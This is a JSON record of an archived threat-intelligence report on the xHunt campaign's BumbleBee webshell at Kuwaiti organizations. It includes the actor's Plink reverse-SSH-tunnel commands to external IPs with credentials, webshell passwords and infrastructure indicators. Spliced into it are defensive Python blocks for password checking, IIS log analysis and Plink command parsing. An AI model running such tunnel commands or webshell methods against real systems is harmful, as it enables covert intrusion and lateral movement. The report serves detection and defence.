{
	"id": "2b666d02-6053-4b56-a18a-4da568b451e6",
	"created_at": "2026-04-06T00:09:38.097515Z",
	"updated_at": "2026-04-10T03:31:42.207203Z",
	"deleted_at": null,
	"sha1_hash": "6ec2a1f5631f6c6dfc4e1ad3c7de7e90b998a7a5",
	"title": "xHunt Campaign: New BumbleBee Webshell and SSH Tunnels Used for Lateral Movement",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 301620,
	"plain_text": "xHunt Campaign: New BumbleBee Webshell and SSH Tunnels\r\nUsed for Lateral Movement\r\nBy Robert Falcone\r\nPublished: 2021-01-11 · Archived: 2026-04-05 17:26:35 UTC\r\nExecutive Summary\r\nIn September 2020, we began investigating a Microsoft Exchange server at a Kuwaiti organization that a threat\r\ngroup compromised as part of a continued xHunt campaign. This investigation resulted in the discovery of two\r\nnew backdoors called TriFive and Snugy, which we discussed in a prior blog, as well as a new webshell that we\r\ncall BumbleBee that we will explain in greater detail in this blog. We use this name because the color scheme of\r\nthe BumbleBee webshell includes white, black and yellow, as seen in Figure 1.\r\nThe actor used the BumbleBee webshell to upload and download files to and from the compromised Exchange\r\nserver, but more importantly, to run commands that the actor used to discover additional systems and to move\r\nlaterally to other servers on the network. We found BumbleBee hosted on an internal Internet Information Services\r\n(IIS) web server on the same network as the compromised Exchange server, as well as on two internal IIS web\r\nservers at two other Kuwaiti organizations. As mentioned in our prior xHunt Campaign blog, we still do not know\r\nthe initial infection vector used to compromise the Exchange server, as this appears to have occurred prior to the\r\nlogs we were able to collect.\r\nWe observed the actor interacting directly with the BumbleBee webshell on the compromised Exchange server of\r\nthe Kuwaiti organization, as this server was accessible from the internet. The actor used Virtual Private Networks\r\n(VPNs) provided by Private Internet Access when directly accessing BumbleBee on internet-accessible servers.\r\nThe actor would frequently switch between different VPN servers to change the external IP address of the activity\r\nthat the server would store in the logs. 
Specifically, the actor changed the IP address to appear to be from different\r\ncountries, including Belgium, Germany, Ireland, Italy, Luxembourg, the Netherlands, Poland, Portugal, Sweden\r\nand the United Kingdom. We believe this is an attempt to evade detection and make analysis of the malicious\r\nactivities more difficult. We also observed the actor switching between different operating systems and browsers,\r\nspecifically Mozilla Firefox or Google Chrome on Windows 10, Windows 8.1 or Linux systems. This suggests the\r\nactor has access to multiple systems and uses this to make analysis of the activities more difficult, or that there are\r\nmultiple actors involved, who have differing preferences for operating systems and browsers.\r\nIn addition to using VPNs, the actor used SSH tunnels to interact with BumbleBee webshells hosted on internal\r\nIIS web servers that are not accessible directly from the internet at all three Kuwaiti organizations. The commands\r\nexecuted on the servers via BumbleBee suggest that the actor used the PuTTY Link (Plink) tool to create SSH\r\ntunnels to access services internal to the compromised network. We observed the actor using Plink to create an\r\nSSH tunnel for TCP port 3389, which suggests that the actor used the tunnel to access the system using Remote\r\nDesktop Protocol (RDP). We also observed the actor creating SSH tunnels to internal servers for TCP port 80,\r\nwhich suggests the actor used the tunnel to access internal IIS web servers. 
We believe that the actor accessed these additional internal IIS web servers to leverage file uploading functionality\r\nin internal web applications to install BumbleBee as a method of lateral movement.\r\nhttps://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/\r\nPage 1 of 17\n\nPalo Alto Networks Next-Generation Firewall customers are protected from these xHunt-related attacks with\r\nThreat Prevention, URL Filtering and DNS Security subscriptions.\r\nBumbleBee Webshell\r\nThe threat group involved in the xHunt campaign compromised an Exchange server at a Kuwaiti organization and\r\ninstalled a webshell that we call BumbleBee. We call the webshell BumbleBee because the color scheme of the\r\nwebshell includes white, black and yellow, as seen in Figure 1. BumbleBee is straightforward: it allows an\r\nattacker to execute commands and to upload and download files to and from the server. The interesting part of\r\nBumbleBee is that it requires an actor to supply one password to view the webshell and a second password to\r\ninteract with the webshell.\r\nFigure 1. BumbleBee webshell used by xHunt actor to run commands on Microsoft Exchange\r\nServer.\r\nTo view the BumbleBee webshell, the actor must provide a password in a URL parameter named parameter.\r\nOtherwise, the form used to interact with BumbleBee will not display in the browser. To check the supplied\r\npassword for authentication, the webshell generates an MD5 hash of the parameter value and compares it with a\r\nhardcoded MD5 hash. In the BumbleBee sample hosted on the compromised Exchange server, the hardcoded value\r\nwas 1B2F81BD2D39E60F1E1AD05DD3BF9F56, the MD5 hash of the password string fkeYMvKUQlA5asR.\r\nOnce displayed, BumbleBee provides the actor three main functionalities:\r\n1. Executing commands via cmd /c\r\n2. Uploading files to the server to a specified folder (c:\\windows\\temp by default).\r\n3. 
Downloading files from the server.\r\nTo carry out any of these functions, the actor must supply a second password (in the field with the added\r\n“password” label in Figure 1). The BumbleBee webshell generates an MD5 hash of the password and compares it\r\nwith a hardcoded MD5 hash before carrying out the functionality. The MD5 hash checked prior to carrying out the\r\nactor’s desired actions was 36252C6C2F616C5664A54058F33EF463, but we were unfortunately unable to\r\ndetermine the string form of this password. While we did not know the password required to use BumbleBee’s\r\nfunctionality, we were able to determine the commands executed via the webshell by analyzing logs from the\r\ncompromised Exchange server, which we will discuss in detail in a later section of this blog.\r\nWhile carrying out our analysis, we found a second BumbleBee webshell that contained different MD5 hashes for\r\nviewing the webshell and executing commands, which were A2B4D934D394B54672EA10CA8A65C198 and\r\n28D968F26028D956E6F1199092A1C408, respectively. We determined that the hash of\r\nA2B4D934D394B54672EA10CA8A65C198 was for the password TshuYoOARg3fndI, but we were unable to\r\ndetermine the string for the second hash. This webshell was hosted at an internal IIS web server at the same\r\nKuwaiti organization where the original BumbleBee was found on a compromised Exchange server. 
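The two-gate check just described, as an added example (this is not BumbleBee’s own source, which this page does not reproduce): a Python reimplementation of the comparison the webshell performs at each gate, together with the analyst-side wordlist check used to recover the viewing passwords quoted above. The four hash values are the ones reported on this page; the dictionary layout, the sample names and the candidate list are assumptions made for the example.

```python
import hashlib

# Hashes quoted on this page. In each sample the first value gates viewing the
# form (URL parameter literally named 'parameter'); the second gates command
# execution, upload and download. Sample names are labels chosen here.
BUMBLEBEE_HASHES = {
    'exchange_server_sample': {
        'view': '1B2F81BD2D39E60F1E1AD05DD3BF9F56',
        'execute': '36252C6C2F616C5664A54058F33EF463',
    },
    'internal_iis_sample': {
        'view': 'A2B4D934D394B54672EA10CA8A65C198',
        'execute': '28D968F26028D956E6F1199092A1C408',
    },
}

# Candidate list assumed for the example: the two viewing passwords the page
# recovered plus the SSH credentials from the actor's cheat sheet.
CANDIDATES = ['fkeYMvKUQlA5asR', 'TshuYoOARg3fndI', 'bor', '123321']


def md5_hex(text):
    # Unsalted MD5 of the raw bytes, uppercase hex to match the page's notation.
    return hashlib.md5(text.encode('utf-8')).hexdigest().upper()


def gate_allows(supplied, expected_hash):
    # The comparison the webshell makes at each gate. Case matters: MD5 of a
    # different byte string is a different digest.
    return md5_hex(supplied) == expected_hash.upper()


def recover_password(expected_hash, candidates):
    # Analyst side: first candidate whose MD5 equals the recovered hash, else None.
    target = expected_hash.upper()
    for candidate in candidates:
        if md5_hex(candidate) == target:
            return candidate
    return None


def recover_all(hashes, candidates):
    # Map (sample, gate) to the recovered password or None for every hash.
    return {
        (sample, gate): recover_password(digest, candidates)
        for sample, gates in hashes.items()
        for gate, digest in gates.items()
    }


if __name__ == '__main__':
    for key, value in sorted(recover_all(BUMBLEBEE_HASHES, CANDIDATES).items()):
        print(key, '->', value)
```

Two points follow from the check itself. The viewing password travels in the query string, so any IIS or proxy log that records cs-uri-query holds it in clear text; an incident responder can read it straight out of the logs rather than crack it. The execution password is the real barrier, and an unsalted MD5 of a short string is an offline wordlist problem, which is why the approach above is worth running against the two still-unknown hashes before falling back, as the page had to, on correlating IIS and endpoint logs.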
We also\r\nfound this specific BumbleBee sample hosted on internal IIS web servers at two other organizations in Kuwait.\r\nWe were able to collect endpoint logs from an internal IIS web server at one of the two Kuwaiti organizations to\r\ndetermine the commands executed via BumbleBee, which we will also discuss in a later section of this blog.\r\nInteractions With Compromised Microsoft Exchange Server\r\nTo determine the actor’s activities regarding the compromised Exchange server of a Kuwaiti organization, we\r\ncollected IIS server logs from the Exchange server and the logs generated for the system by Cortex XDR. Within\r\nthe IIS logs, we were able to observe the HTTP POST requests generated when the actor issued commands via the\r\nBumbleBee webshell installed on the compromised Exchange server. Using the IIS logs, we were also able to\r\nobserve the actor logging into a compromised email account via Outlook Web App and carrying out specific\r\nactivities once logged in, such as viewing emails and searching for other email accounts on the compromised\r\nnetwork.\r\nUnfortunately, the compromised Exchange server cannot log the data within the POST requests, so while we know\r\nhow many commands were issued from these logs, we do not know the actual commands that the actor executed.\r\nAlso, we were only able to collect 34 days’ worth of logs from the period between Jan. 31, 2020, and Sept. 16,\r\n2020, which did not include all the IIS logs from the compromised Exchange server. Due to these large gaps in\r\nlogs, we do not have a complete picture of the activity or even visibility into the beginning of the actor’s\r\ninteractions with the compromised Exchange server. For example, the IIS logs show the first BumbleBee webshell\r\nactivity on Feb. 1, 2020, but they also show the TriFive backdoor logging into a compromised email account every\r\nfive minutes starting at 12:02 AM UTC on Jan. 31, 2020. 
The five-minute TriFive beacons suggest it was\r\nrunning repeatedly via the scheduled task discussed in our previous blog on the backdoors related to this incident,\r\nwhich also suggests that the actor had already gained sustained access to the compromised Exchange server before\r\nthe start of the logs we collected.\r\nUsing the IIS logs we were able to collect from the compromised Exchange server, we put together a\r\ntimeline of the actor’s activity, including interactions with the BumbleBee webshell. On Feb. 1 and July 27, 2020,\r\nthe actor logged into the Exchange server via Outlook Web App using compromised credentials. The actor used\r\nthe search functionality within Outlook Web App to search for email addresses, including searching for the\r\ndomain name of the compromised Kuwaiti organization to get a full list of email addresses, as well as specific\r\nkeywords, such as helpdesk. We also saw the actor viewing emails in the compromised account’s inbox,\r\nspecifically emails from service providers and technology vendors. Additionally, the actor viewed alert emails\r\nfrom a Symantec product and Fortinet’s FortiWeb product. 
The act of searching for emails to the helpdesk and\r\nviewing security alert emails suggests that the threat actor was interested in determining whether the Kuwaiti\r\norganization had become aware of the malicious activities.\r\nIn regard to the BumbleBee webshell activity, the important pieces of information in the IIS logs used to generate\r\na timeline were:\r\nTimestamp of the HTTP requests.\r\nActor’s IP address.\r\nUser-agent in the HTTP request, which provides the actor’s operating system and browser version.\r\nClientId in the URL parameters, a unique identifier for the client provided by the Exchange server via a\r\nserver-side cookie.\r\nTable 1 in the Appendix provides the timeline of activity regarding the actor’s use of the BumbleBee webshell,\r\nwhich began on Feb. 1, 2020, according to the logs we were able to collect. While creating this timeline, we\r\nnoticed a few interesting observables and behaviors exhibited by the actor when interacting with BumbleBee,\r\nincluding:\r\nAll but one of the IP addresses used by the actor are associated with a VPN provided by Private Internet\r\nAccess, with the other IP address belonging to FalcoVPN.\r\nThe actor switched between VPN servers in different locations to change IP address and to appear to\r\noriginate from different countries, specifically Belgium, Germany, Ireland, Italy, Luxembourg, the\r\nNetherlands, Poland, Portugal, Sweden and the United Kingdom.\r\nThe actor used a combination of operating systems and browsers when interacting with BumbleBee,\r\nspecifically Firefox or Chrome on Windows 10, Windows 8.1 or Linux systems.\r\nCommands Executed via BumbleBee\r\nAs we previously mentioned, the compromised Exchange server of a Kuwaiti organization does not log the POST\r\ndata within the IIS logs, so we were unable to extract the commands run on the BumbleBee webshell. 
However,\r\nwe used overlapping timestamps to correlate the activity in the IIS logs with the command prompt activity seen in\r\nCortex XDR logs to determine the commands executed on the server. Unfortunately, we did not have visibility\r\ninto the commands executed on BumbleBee until Sept. 16, 2020, when Cortex XDR was installed on the\r\ncompromised Exchange server in response to the suspicious activity. We were also able to determine the\r\ncommands run on the BumbleBee webshell hosted on the internal IIS web server at one of the two other Kuwaiti\r\norganizations.\r\nBased on the Cortex XDR logs, the actor spent three hours and 37 minutes on Sept. 16, 2020, running commands\r\nvia the BumbleBee webshell installed on the compromised Exchange server. Table 2 in the Appendix shows all the\r\ncommands and the MITRE ATT\u0026CK technique identifiers that best describe the activities carried out. The\r\ncommands show the actor:\r\n1. Performing network discovery (T1018) using ping and net group commands, as well as PowerShell\r\n(T1059.001), to find additional computers on the network.\r\n2. Performing account discovery (T1087) using the whoami and quser commands.\r\n3. Determining the system time (T1124) using the W32tm and time commands.\r\n4. Creating an SSH tunnel (T1572) using Plink (RTQ.exe) to a remote host.\r\n5. Using RDP (T1021.001) over the SSH tunnel to control the compromised computer.\r\n6. Laterally moving (T1570) to another system by mounting a shared folder, copying Plink (RTQ.exe) to a\r\nremote system and using Windows Management Instrumentation (WMI) (T1047) to create an SSH tunnel\r\nfor RDP access.\r\n7. 
Removing evidence of their presence by deleting (T1070.004) BumbleBee after they were done issuing\r\ncommands.\r\nThe commands listed in Table 2 in the Appendix also show the actor using Plink (RTQ.exe) to create an SSH\r\ntunnel to an external IP address 192.119.110[.]194, as seen in the following command:\r\necho y | c:\\windows\\temp\\RTQ.exe 192.119.110[.]194 -C -R 0.0.0.0:8081:\u003credacted IP #2\u003e:3389 -l bor -pw 123321 -P 443\r\nRead from the compromised host outward, Plink connects to 192.119.110[.]194 on TCP port 443 (-P 443, so the\r\nSSH session looks like HTTPS to anyone watching egress), logs in with the username and password given by -l and\r\n-pw, enables compression (-C) and asks the remote SSH server to listen on TCP port 8081 on all of its interfaces\r\n(-R 0.0.0.0:8081) and relay whatever arrives there back through the tunnel to port 3389 on the internal host. The\r\nleading echo y answers Plink’s prompt to cache the unknown server host key, so the command completes without\r\nany interaction. An RDP client connecting to port 8081 on the actor’s server therefore reaches the internal host’s\r\nRDP service.\r\nThe IP address overlaps with other related infrastructure that we will discuss in a later section of this blog. Most\r\nimportantly, the username and password of bor and 123321 used to create the SSH tunnel overlap directly with\r\nprior xHunt activity. These exact credentials were listed within the cheat sheet found within the Sakabota tool,\r\nwhich provided an example command that the actor could use to create SSH tunnels using Plink. We believe the\r\nactor used the example command from the cheat sheet as a basis for the commands they used to create the SSH\r\ntunnels via BumbleBee.\r\nThe actor creates these SSH tunnels to connect to RDP services on Windows systems that are not accessible from\r\nthe internet, specifically to use RDP to interact with the compromised system and to use Graphical User Interface\r\n(GUI) applications. The actor also uses these SSH tunnels to move laterally to other systems on the network,\r\nspecifically to access internal systems that are not remotely accessible from the internet, as depicted in Figure 2.\r\nFigure 2. Visualization of xHunt actor accessing an internal system from an SSH tunnel created on\r\nthe internet accessible server hosting BumbleBee.\r\nIn addition to analyzing commands executed on the compromised Exchange server, we also analyzed the\r\ncommands executed on the BumbleBee webshell at an internal IIS web server hosted at one of the two other\r\nKuwaiti organizations. On Sept. 
10, 2020, we found that the actor ran several commands to perform network and\r\nuser account discovery. Additionally, the actor used BumbleBee to upload a second webshell with a filename of\r\ncq.aspx. The actor used this second webshell to run a PowerShell script that issued SQL queries to a Microsoft\r\nSQL Server database.\r\nThe actor first issued a SQL query to check the version of SQL server, followed by the actor issuing two\r\nadditional queries that were very specific to the web application running on the IIS web server. The PowerShell\r\nscript used to issue the SQL queries is very similar to scripts that were included in a Microsoft Technet forum post\r\ntitled Running SQL via PowerShell, which suggests the actor may have used this forum post as a basis for the\r\nPowerShell script. We were unable to obtain the second webshell, as the actor deleted it via the BumbleBee\r\nwebshell when they were finished. Table 3 in the Appendix shows the commands executed via BumbleBee on\r\nSept. 10, 2020.\r\nThe logs on the IIS web server hosting the BumbleBee webshell used to issue the commands in Table 3 only\r\nincluded internal IP addresses for the source of the activity. The internal IP addresses suggested this web server\r\nwas not publicly accessible and did not expose the actor’s source IP address. However, all of the attempts to\r\naccess BumbleBee and run the commands in Table 3 had 192.119.110[.]194:8083 as the host in the URL of the\r\nreferrer field within the web server logs. This external IP address in the referrer field suggests that the actor was\r\naccessing BumbleBee via an SSH tunnel. 
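The IIS log fields listed earlier (timestamp, source IP, user-agent) and the referrer observation just made, turned into detection logic as an added example; Unit 42 does not publish its tooling and this is not it. The code parses IIS W3C extended log lines, treats any .aspx request whose query string carries a key literally named parameter as a BumbleBee interaction, counts POSTs as command or file-transfer events (IIS does not log the request body, so the count is all that can be recovered, as the page notes), reports the distinct source IPs seen behind each user-agent so that VPN hopping stands out, and flags a referrer whose host is a public IP on a non-web port, the 192.119.110[.]194:8083 pattern left on the internal server. The log lines are constructed: the webshell paths, the hostname mail.example.test, the timestamps and the source addresses in the documentation ranges 203.0.113.0/24 and 198.51.100.0/24 (standing in for the VPN exits) are invented; the parameter name, the two viewing passwords and the tunnel endpoint are from this page.

```python
import ipaddress
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed IIS W3C log excerpts (not from the incident). Paths, hostname,
# timestamps and source IPs are invented; 203.0.113.0/24 and 198.51.100.0/24
# stand in for the VPN exit addresses. The query key 'parameter', the viewing
# passwords and the referrer endpoint 192.119.110.194:8083 are from this page.
EXCHANGE_LOG = '''#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2020-09-16 13:41:50 10.0.0.10 GET /aspnet_client/bee.aspx parameter=fkeYMvKUQlA5asR 443 - 203.0.113.17 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:80.0)+Gecko/20100101+Firefox/80.0 - 200 0 0 15
2020-09-16 13:42:12 10.0.0.10 POST /aspnet_client/bee.aspx parameter=fkeYMvKUQlA5asR 443 - 203.0.113.17 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:80.0)+Gecko/20100101+Firefox/80.0 https://mail.example.test/aspnet_client/bee.aspx?parameter=fkeYMvKUQlA5asR 200 0 0 240
2020-09-16 14:27:39 10.0.0.10 POST /aspnet_client/bee.aspx parameter=fkeYMvKUQlA5asR 443 - 198.51.100.42 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:80.0)+Gecko/20100101+Firefox/80.0 https://mail.example.test/aspnet_client/bee.aspx?parameter=fkeYMvKUQlA5asR 200 0 0 198
2020-09-16 14:30:02 10.0.0.10 GET /owa/ - 443 - 198.51.100.42 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:80.0)+Gecko/20100101+Firefox/80.0 - 200 0 0 12
'''

INTERNAL_IIS_LOG = '''#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2020-09-10 09:12:03 10.1.2.3 GET /upload/bee.aspx parameter=TshuYoOARg3fndI 80 - 10.1.2.50 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/85.0.4183.83+Safari/537.36 - 200 0 0 31
2020-09-10 09:12:40 10.1.2.3 POST /upload/bee.aspx parameter=TshuYoOARg3fndI 80 - 10.1.2.50 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/85.0.4183.83+Safari/537.36 http://192.119.110.194:8083/upload/bee.aspx?parameter=TshuYoOARg3fndI 200 0 0 94
'''


def parse_iis_w3c(text):
    # Yield one dict per request line, naming columns from the #Fields: directive.
    fields = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith('#Fields:'):
            fields = line.split()[1:]
        elif not line or line.startswith('#') or fields is None:
            continue
        else:
            values = line.split(' ')
            if len(values) == len(fields):
                yield dict(zip(fields, values))


def is_webshell_request(rec, param='parameter'):
    # BumbleBee shows its form only when the query carries the viewing password
    # under a key literally named 'parameter'; a POST to that URI is a command,
    # upload or download (the body itself is never in the IIS log).
    query = rec.get('cs-uri-query', '-')
    keys = {part.split('=', 1)[0] for part in query.split('&') if part != '-'}
    return rec.get('cs-uri-stem', '').lower().endswith('.aspx') and param in keys


def tunnel_endpoint(rec):
    # A referrer whose host is a public IP on a non-web port means the browser
    # was pointed at an SSH tunnel listener, not at this server's own name.
    # Returns host:port or None.
    ref = rec.get('cs(Referer)', '-')
    if ref == '-':
        return None
    parts = urlsplit(ref)
    if parts.hostname is None:
        return None
    try:
        public_ip = not ipaddress.ip_address(parts.hostname).is_private
    except ValueError:
        public_ip = False  # a hostname, not an IP literal
    if public_ip and parts.port not in (None, 80, 443):
        return parts.hostname + ':' + str(parts.port)
    return None


def analyze(text):
    # Summarize webshell activity: POST count, source IPs per user agent (VPN
    # hopping shows as several IPs behind one UA) and tunnel endpoints seen.
    posts = 0
    ips_by_ua = defaultdict(set)
    tunnels = set()
    for rec in parse_iis_w3c(text):
        if not is_webshell_request(rec):
            continue
        if rec['cs-method'] == 'POST':
            posts += 1
        ips_by_ua[rec['cs(User-Agent)']].add(rec['c-ip'])
        endpoint = tunnel_endpoint(rec)
        if endpoint:
            tunnels.add(endpoint)
    return {
        'posts': posts,
        'ips_by_ua': {ua: sorted(ips) for ua, ips in ips_by_ua.items()},
        'tunnels': sorted(tunnels),
    }


if __name__ == '__main__':
    for name, log in (('exchange', EXCHANGE_LOG), ('internal_iis', INTERNAL_IIS_LOG)):
        print(name, analyze(log))
```

On the Exchange excerpt the result is two commands from two different source addresses behind one browser fingerprint and no tunnel endpoints, which is what an internet-facing server reached over a VPN looks like; on the internal excerpt it is one command from an internal source with 192.119.110.194:8083 in the referrer, the signature of a browser reaching the server through a reverse SSH tunnel. The referrer check deliberately treats hostnames as benign, so a server reached through its own DNS name does not fire.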
The IP address in the referrer field is also the same as in the command\r\nissued to create the SSH tunnels for RDP access that we observed on the compromised Exchange server, as shown\r\nin Table 2.\r\nFile Uploader and SSH Tunnels\r\nDuring our research, we found a second BumbleBee webshell that was hosted on an internal IIS web server at the\r\ninitial Kuwaiti organization, as well as on internal IIS web servers at two other Kuwaiti organizations. This\r\nBumbleBee webshell had different passwords to view and run commands compared to the first sample we\r\nanalyzed. The second BumbleBee webshell required the actor to include the password TshuYoOARg3fndI within\r\na URL parameter aptly named parameter. As with the initial BumbleBee sample, we do not know the password the\r\nactor must include to be able to run commands on the webshell.\r\nBy analyzing artifacts on the internal IIS web server, we were able to determine that on July 16, 2020, the actor\r\nran similar commands to create SSH tunnels using Plink as those seen in Table 2 in the Appendix. We determined\r\nthe actor executed commands that use the same username and password as seen in the xHunt cheat sheet, but with\r\na different external IP address controlled by the actor, as in the following:\r\n1.exe 142.11.211[.]79 -C -R 0.0.0.0:8080:10.x.x.x:80 -l bor -pw 123321 -P 443\r\nSVROOT.exe 142.11.211[.]79 -C -R 0.0.0.0:8081:10.x.x.x:80 -l bor -pw 123321 -P 443\r\nThese commands differ from those used to create the SSH tunnel on the compromised Exchange server that\r\nallowed the actor to connect to the server using RDP over TCP port 3389. The commands above attempt to create\r\na tunnel to allow the actor to access web servers hosted at other internal servers over TCP port 80. 
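The Plink command lines on this page (the RDP tunnel from the Exchange server and the two port-80 tunnels above), decoded by an added example that is not the page’s or Unit 42’s code: a small parser for Plink invocations that recovers the SSH server, the port it is reached on, the credentials and every -R, -L or -D forward, then lists what a detection rule would raise. The sample commands are the page’s own with the executable path dropped and the redacted or masked internal addresses replaced by the constructed 10.20.30.40 and 10.0.0.5; the benign jump-host command used as a control is invented. Flag meanings are Plink’s documented ones.

```python
import ipaddress
from dataclasses import dataclass, field

# Username and password the page ties to the Sakabota cheat sheet.
CHEAT_SHEET_CREDS = ('bor', '123321')
SERVICE_NAMES = {22: 'SSH', 80: 'HTTP', 389: 'LDAP', 443: 'HTTPS', 445: 'SMB', 3389: 'RDP'}
# Plink options that consume the next token, so it must not be taken as the host.
FLAGS_WITH_ARG = {'-R', '-L', '-D', '-P', '-l', '-pw', '-i', '-m', '-proxycmd', '-hostkey'}

# The page's command lines, with the executable path dropped and the redacted
# or masked internal addresses replaced by constructed ones (10.20.30.40,
# 10.0.0.5); the third, a benign jump-host command, is invented as a control.
SAMPLE_COMMANDS = [
    'echo y | RTQ.exe 192.119.110.194 -C -R 0.0.0.0:8081:10.20.30.40:3389 -l bor -pw 123321 -P 443',
    '1.exe 142.11.211.79 -C -R 0.0.0.0:8080:10.0.0.5:80 -l bor -pw 123321 -P 443',
    'plink.exe admin@jumphost.example.test -L 5900:10.0.0.9:5900 -batch',
]

@dataclass
class PlinkInvocation:
    ssh_host: str = ''
    ssh_port: int = 22
    user: str = ''
    password: str = ''
    compress: bool = False
    host_key_autoaccept: bool = False
    # (kind, listen_host, listen_port, target_host, target_port); target is None for -D
    forwards: list = field(default_factory=list)

def parse_forward(kind, spec):
    # -R and -L take [listen_host:]listen_port:target_host:target_port;
    # -D takes [listen_host:]listen_port. An omitted listen host means loopback.
    parts = spec.split(':')
    if kind == 'D' and len(parts) in (1, 2):
        listen_host = parts[0] if len(parts) == 2 else '127.0.0.1'
        return (kind, listen_host, int(parts[-1]), None, None)
    if kind in ('R', 'L') and len(parts) == 3:
        return (kind, '127.0.0.1', int(parts[0]), parts[1], int(parts[2]))
    if kind in ('R', 'L') and len(parts) == 4:
        return (kind, parts[0], int(parts[1]), parts[2], int(parts[3]))
    raise ValueError('bad forward spec: ' + spec)

def parse_plink(cmdline):
    # Only the last pipeline stage is Plink. A leading 'echo y |' feeds y to the
    # prompt that asks to cache an unknown server host key, so no operator is needed.
    tokens = cmdline.rsplit('|', 1)[-1].split()
    inv = PlinkInvocation(host_key_autoaccept='|' in cmdline)
    i = 1  # tokens[0] is the binary, whatever it was renamed to (RTQ.exe, 1.exe, SVROOT.exe)
    while i < len(tokens):
        tok = tokens[i]
        nxt = tokens[i + 1] if i + 1 < len(tokens) else ''
        if tok in ('-R', '-L', '-D'):
            inv.forwards.append(parse_forward(tok[1], nxt))
        elif tok == '-P':
            inv.ssh_port = int(nxt)
        elif tok == '-l':
            inv.user = nxt
        elif tok == '-pw':
            inv.password = nxt
        elif tok == '-C':
            inv.compress = True
        elif not tok.startswith('-') and not inv.ssh_host:
            if '@' in tok:  # first positional argument is [user@]host
                inv.user, tok = tok.split('@', 1)
            inv.ssh_host = tok
        i += 2 if tok in FLAGS_WITH_ARG else 1
    return inv

def assess(inv):
    # The findings a detection rule would raise for one invocation.
    findings = []
    try:
        external = not ipaddress.ip_address(inv.ssh_host).is_private
    except ValueError:
        external = True  # hostname: treat as external until resolved
    for kind, listen_host, listen_port, target_host, target_port in inv.forwards:
        if kind == 'R':
            svc = SERVICE_NAMES.get(target_port, 'tcp/' + str(target_port))
            findings.append('reverse tunnel: ' + inv.ssh_host + ':' + str(listen_port)
                            + ' -> ' + target_host + ':' + str(target_port) + ' (' + svc + ')')
            if listen_host == '0.0.0.0':
                findings.append('listener requested on all interfaces of the SSH server (honored only with GatewayPorts)')
        elif kind == 'L':
            findings.append('local forward: ' + str(listen_port) + ' -> ' + target_host + ':' + str(target_port))
        else:
            findings.append('dynamic SOCKS proxy on ' + str(listen_port))
    if external and inv.ssh_port in (80, 443):
        findings.append('SSH to external host on port ' + str(inv.ssh_port) + ' (blends with web egress)')
    if (inv.user, inv.password) == CHEAT_SHEET_CREDS:
        findings.append('credentials match the xHunt cheat sheet')
    if inv.password:
        findings.append('password on the command line (recoverable from process logs)')
    if inv.host_key_autoaccept:
        findings.append('host key auto-accepted via piped input')
    return findings

if __name__ == '__main__':
    for cmd in SAMPLE_COMMANDS:
        print(cmd)
        for finding in assess(parse_plink(cmd)):
            print('  -', finding)
```

The parser keys on flags rather than on the file name, because the page shows the same binary as RTQ.exe, 1.exe and SVROOT.exe; a rule that matched plink.exe would have missed every one of these. The strongest single signal is the -R forward whose target port is 3389 or 80 with an external SSH host on 443, and the -pw value on the command line is the reason the cheat-sheet credentials could be read out of process-creation logs at all.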
We believe the\r\nactor used these SSH tunnels to gain access to web servers on other internal networks with hopes of finding\r\nsimilar file uploading functionality on those servers. If found, we believe the actor would use the file uploading\r\nfunctionality to upload a webshell to compromise the remote server for lateral movement.\r\nWe checked the IIS logs that contained BumbleBee webshell activity and found three external IP addresses within\r\nthe URLs of the referrer field of inbound HTTP requests. The presence of these IP addresses in the referrer field\r\nsuggests that the actor used the SSH tunnels to access the web servers by including the following IP and TCP ports\r\nin the URL field of their browser:\r\n142.11.211[.]79:8080\r\n142.11.211[.]79:8081\r\n91.92.109[.]59:1234\r\n91.92.109[.]59:1255\r\n91.92.109[.]59:1288\r\n91.92.109[.]59:1289\r\n192.119.110[.]194:8083\r\nRelated xHunt Infrastructure\r\nThe inbound requests to the BumbleBee webshell hosted on the compromised Exchange server did not provide\r\nany decent pivot points to other xHunt infrastructure, as all the external IP addresses were of VPN servers the\r\nactor used when interacting with the webshell. Fortunately, we were able to extract known xHunt infrastructure\r\nused as the remote servers for the SSH tunnels that the actor created to access systems via RDP and internal web\r\nservices. The three external servers used for the SSH tunnels were 192.119.110[.]194, 142.11.211[.]79 and\r\n91.92.109[.]59, which provided overlaps with other infrastructure seen in the chart in Figure 3.\r\nFigure 3. 
Infrastructure associated with xHunt servers used for SSH tunnels.\r\nThe domains ns1.backendloop[.]online and ns2.backendloop[.]online have resolved to all three of the IP addresses\r\nused as the remote end of the SSH tunnels. More recently, these two domains have resolved to an IP address of\r\n192.255.166[.]158, which may suggest that the actor is using a server at this IP address in current operations.\r\nVarious subdomains of the following domains have also resolved to the 91.92.109[.]59 IP address, suggesting that\r\nthey are also part of the actor’s infrastructure:\r\nbackendloop[.]online\r\nbestmg[.]info\r\nwindowsmicrosofte[.]online\r\nThe domain windowsmicrosofte[.]online contains the substring microsofte, which was seen in the Hisoka C2\r\ndomain of microsofte-update[.]com as mentioned in our initial publication on xHunt’s attacks on Kuwaiti shipping\r\nand transportation organizations. Unfortunately, we have not seen any of these domains used by the actor within\r\nour telemetry, so we cannot determine their purpose within the actor’s operations.\r\nConclusion\r\nThe xHunt campaign continues: the actor installed a webshell we call BumbleBee on the compromised Exchange\r\nserver of a Kuwaiti organization, and we also found BumbleBee hosted on an internal IIS web server on the same\r\nnetwork. We also discovered BumbleBee on two internal IIS web servers at two other Kuwaiti organizations. 
